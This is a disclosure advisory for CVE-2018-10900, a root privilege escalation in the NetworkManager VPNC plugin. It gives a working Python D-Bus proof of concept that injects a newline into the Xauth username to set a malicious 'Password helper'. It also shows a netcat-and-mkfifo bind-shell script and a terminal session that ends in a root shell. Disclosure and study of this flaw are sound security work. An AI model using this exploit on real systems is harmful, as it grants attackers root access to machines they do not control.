Network Manager VPNC 1.2.4 Privilege Escalation

`Network Manager VPNC - Privilege Escalation (CVE-2018-10900)  
  
Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc  
Date Released: 21/07/2018   
CVE: CVE-2018-10900  
Author: Denis Andzakovic   
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc   
Affected Software: Network Manager VPNC a 1.2.4   
  
--[ Description  
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root.   
  
--[ Privilege Escalation  
  
When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file.  
  
The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter.  
  
import dbus  
con = {  
'vpn':{  
'service-type':'org.freedesktop.NetworkManager.vpnc',  
'data':{  
'IKE DH Group':'dh2',  
'IPSec ID':'testgroup',  
'IPSec gateway':'gateway',  
'IPSec secret-flags':'4',  
'Local Port':'0',  
'NAT Traversal Mode': 'natt',  
'Perfect Forward Secrecy': 'server',  
'Vendor': 'cisco',  
'Xauth password-flags': '4',  
'Xauth username': "username\nPassword helper /tmp/test",  
'ipsec-secret-type': 'unused',  
'xauth-password-type': 'unused'  
}  
},  
'connection':{  
'type':'vpn',  
'id':'vpnc_test',  
},  
'ipv4':{'method':'auto'},  
'ipv6':{'method':'auto'}  
}  
bus = dbus.SystemBus()  
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")  
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")  
settings.AddConnection(con)  
  
The above results in the following configuration being passed to the vpnc process when the connection is initialized:   
  
Debug 0  
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4  
Cisco UDP Encapsulation Port 0  
Local Port 0  
IKE DH Group dh2  
Perfect Forward Secrecy server  
Xauth username username  
Password helper /tmp/test  
IPSec gateway gateway  
IPSec ID testgroup  
Vendor cisco  
NAT Traversal Mode natt  
  
The following figure details the complete privilege escalation attack.  
  
doi@ubuntu:~$ cat << EOF > /tmp/test  
> #!/bin/bash  
> mkfifo pipe  
> nc -k -l -p 8080 < pipe | /bin/bash > pipe  
> EOF  
doi@ubuntu:~$ python vpnc_privesc.py  
doi@ubuntu:~$ nmcli connection  
NAME UUID TYPE DEVICE  
Wired connection 1 a8b178fd-8cbc-3e15-aa9e-d52982215d98 ethernet ens3  
vpnc_test 233101cb-f786-44ed-9e4f-662f1a519429 vpn ens3  
doi@ubuntu:~$ nmcli connection up vpnc_test  
  
^Z  
[1]+ Stopped nmcli connection up vpnc_test  
doi@ubuntu:~$ nc -vv 127.0.0.1 8080  
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!  
id  
uid=0(root) gid=0(root) groups=0(root)  
  
--[ Timeline  
  
11/07/2018 - Advisory sent to [email protected]   
13/07/2018 - Acknowledgement from Gnome security   
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day   
21/07/2018 - Network Manager VPNC 1.2.6 released  
21/07/2018 - Advisory released  
  
--[ About Pulse Security  
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.  
  
W: https://pulsesecurity.co.nz  
E: info at pulsesecurity.co.nz  
  
  
  
`